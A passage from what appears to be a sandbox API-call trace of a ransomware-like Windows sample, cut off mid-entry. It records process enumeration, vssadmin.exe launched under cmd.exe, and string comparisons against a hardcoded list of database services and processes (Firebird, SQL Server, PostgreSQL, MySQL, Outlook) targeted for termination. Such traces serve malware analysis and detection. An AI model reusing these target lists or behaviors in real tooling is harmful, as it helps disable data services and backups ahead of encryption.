Process32NextW (in: hSnapshot=0x240, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0054.474] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0054.474] Process32NextW (in: hSnapshot=0x240, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ivttvf.exe")) returned 1 [0054.475] lstrlenW (lpString="ivttvf.exe") returned 10 [0054.475] Process32NextW (in: hSnapshot=0x240, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa90, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0054.475] lstrlenW (lpString="cmd.exe") returned 7 [0054.475] Process32NextW (in: hSnapshot=0x240, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0054.476] lstrlenW (lpString="conhost.exe") returned 11 [0054.476] Process32NextW (in: hSnapshot=0x240, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0xa9c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0054.477] lstrlenW (lpString="vssadmin.exe") returned 12 [0054.477] Process32NextW (in: hSnapshot=0x240, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0054.477] lstrlenW (lpString="VSSVC.exe") returned 9 [0054.477] Process32NextW (in: hSnapshot=0x240, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.478] lstrlenW (lpString="svchost.exe") returned 11 [0054.478] Process32NextW (in: hSnapshot=0x240, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0054.479] CloseHandle (hObject=0x240) returned 1 [0054.479] Sleep (dwMilliseconds=0x1f4) [0055.141] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x5efff8 [0055.141] EnumServicesStatusExW (in: hSCManager=0x5efff8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0) returned 0 [0055.141] GetLastError () returned 0xea [0055.141] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x12c6) returned 0x3f740a8 [0055.142] EnumServicesStatusExW (in: hSCManager=0x5efff8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x3f740a8, cbBufSize=0x12c6, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x3f740a8, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0) returned 1 [0055.142] CloseServiceHandle (hSCObject=0x5efff8) returned 1 [0055.142] lstrlenW (lpString="Appinfo") returned 7 [0055.142] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0055.142] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0055.142] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0055.142] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0055.143] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0055.143] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0055.143] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0055.143] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0055.143] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0055.143] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0055.143] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0055.143] lstrlenW (lpString="AudioSrv") returned 8 [0055.143] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0055.143] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0055.143] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0055.143] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0055.143] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0055.143] lstrlenW (lpString="BFE") returned 3 [0055.143] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0055.143] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0055.143] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0055.143] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0055.143] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0055.143] lstrlenW (lpString="CryptSvc") returned 8 [0055.143] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0055.143] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0055.143] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0055.143] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0055.143] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0055.143] lstrlenW (lpString="CscService") returned 10 [0055.143] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0055.143] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0055.143] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0055.143] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0055.143] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0055.143] lstrlenW (lpString="DcomLaunch") returned 10 [0055.143] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0055.143] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0055.143] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0055.144] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0055.144] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0055.144] lstrlenW (lpString="Dhcp") returned 4 [0055.144] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0055.144] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0055.144] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0055.144] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0055.144] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0055.144] lstrlenW (lpString="Dnscache") returned 8 [0055.144] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0055.144] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0055.144] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0055.144] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0055.144] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0055.144] lstrlenW (lpString="DPS") returned 3 [0055.144] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0055.144] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0055.144] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0055.144] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0055.144] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0055.144] lstrlenW (lpString="eventlog") returned 8 [0055.144] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0055.144] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0055.144] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0055.144] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0055.144] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0055.144] lstrlenW (lpString="EventSystem") returned 11 [0055.144] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0055.144] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0055.144] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0055.144] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0055.144] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0055.144] lstrlenW (lpString="gpsvc") returned 5 [0055.144] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0055.145] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0055.145] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0055.145] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0055.145] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0055.145] lstrlenW (lpString="iphlpsvc") returned 8 [0055.145] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0055.145] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0055.145] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0055.145] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0055.145] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0055.145] lstrlenW (lpString="LanmanServer") returned 12 [0055.145] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0055.145] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0055.145] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0055.145] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0055.145] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0055.145] lstrlenW (lpString="LanmanWorkstation") returned 17 [0055.145] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0055.145] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0055.145] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0055.145] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0055.145] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0055.145] lstrlenW (lpString="lmhosts") returned 7 [0055.145] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0055.145] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0055.145] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0055.145] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0055.145] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0055.145] lstrlenW (lpString="MMCSS") returned 5 [0055.145] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0055.145] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0055.145] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0055.145] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0055.145] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0055.146] lstrlenW (lpString="MpsSvc") returned 6 [0055.146] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0055.146] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0055.146] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0055.146] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0055.146] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0055.146] lstrlenW (lpString="Netman") returned 6 [0055.146] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0055.146] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0055.146] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0055.146] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0055.146] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0055.146] lstrlenW (lpString="netprofm") returned 8 [0055.146] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0055.146] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0055.146] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0055.146] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0055.146] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0055.146] lstrlenW (lpString="NlaSvc") returned 6 [0055.146] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0055.146] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0055.146] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0055.146] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0055.146] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0055.146] lstrlenW (lpString="nsi") returned 3 [0055.146] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0055.146] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0055.146] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0055.146] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0055.146] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0055.146] lstrlenW (lpString="PcaSvc") returned 6 [0055.146] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0055.146] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0055.146] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0055.146] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0055.146] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0055.147] lstrlenW (lpString="PlugPlay") returned 8 [0055.147] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0055.147] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0055.147] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0055.147] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0055.147] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0055.147] lstrlenW (lpString="Power") returned 5 [0055.147] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0055.147] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0055.147] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0055.147] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0055.147] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0055.147] lstrlenW (lpString="ProfSvc") returned 7 [0055.147] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0055.147] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0055.147] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0055.147] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0055.147] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0055.147] lstrlenW (lpString="RpcEptMapper") returned 12 [0055.147] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0055.147] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0055.147] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0055.147] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0055.147] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0055.147] lstrlenW (lpString="RpcSs") returned 5 [0055.147] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0055.147] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0055.147] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0055.147] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0055.147] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0055.147] lstrlenW (lpString="SamSs") returned 5 [0055.147] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0055.147] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0055.147] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0055.147] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0055.148] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0055.148] lstrlenW (lpString="Schedule") returned 8 [0055.148] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0055.148] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0055.148] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0055.148] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0055.148] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0055.148] lstrlenW (lpString="SENS") returned 4 [0055.148] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0055.148] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0055.148] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0055.148] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0055.148] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0055.148] lstrlenW (lpString="ShellHWDetection") returned 16 [0055.148] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0055.148] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0055.148] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0055.148] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0055.148] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0055.148] lstrlenW (lpString="Spooler") returned 7 [0055.148] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0055.148] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0055.148] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0055.148] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0055.148] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0055.148] lstrlenW (lpString="swprv") returned 5 [0055.148] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="swprv") returned -1 [0055.148] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="swprv") returned -1 [0055.148] lstrcmpiW (lpString1="sqlwriter", lpString2="swprv") returned -1 [0055.148] lstrcmpiW (lpString1="mssqlserver", lpString2="swprv") returned -1 [0055.148] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="swprv") returned -1 [0055.148] lstrlenW (lpString="SysMain") returned 7 [0055.148] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0055.148] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0055.149] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0055.149] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0055.149] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0055.149] lstrlenW (lpString="Themes") returned 6 [0055.149] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0055.149] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0055.149] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0055.149] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0055.149] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0055.149] lstrlenW (lpString="TrkWks") returned 6 [0055.149] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0055.149] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0055.149] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0055.149] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0055.149] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0055.149] lstrlenW (lpString="UxSms") returned 5 [0055.149] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0055.149] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0055.149] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0055.149] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0055.149] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0055.149] lstrlenW (lpString="VSS") returned 3 [0055.149] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1 [0055.149] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1 [0055.149] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1 [0055.149] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1 [0055.149] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1 [0055.149] lstrlenW (lpString="WdiServiceHost") returned 14 [0055.149] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0055.149] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0055.149] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0055.149] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0055.149] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0055.149] lstrlenW (lpString="WdiSystemHost") returned 13 [0055.150] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0055.150] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0055.150] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0055.150] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0055.150] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0055.150] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0055.150] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0055.150] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0055.150] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0055.150] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0055.150] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0055.150] lstrlenW (lpString="Winmgmt") returned 7 [0055.150] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0055.150] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0055.150] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0055.150] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0055.150] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0055.150] lstrlenW (lpString="WPDBusEnum") returned 10 [0055.150] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0055.150] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0055.150] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0055.150] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0055.150] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0055.150] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3f740a8 | out: hHeap=0x570000) returned 1 [0055.150] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x224 [0055.152] Process32FirstW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0055.153] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0055.154] lstrlenW (lpString="System") returned 6 [0055.154] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0055.154] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0055.154] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0055.154] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0055.154] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0055.154] lstrcmpiW (lpString1="mysqld.exe", 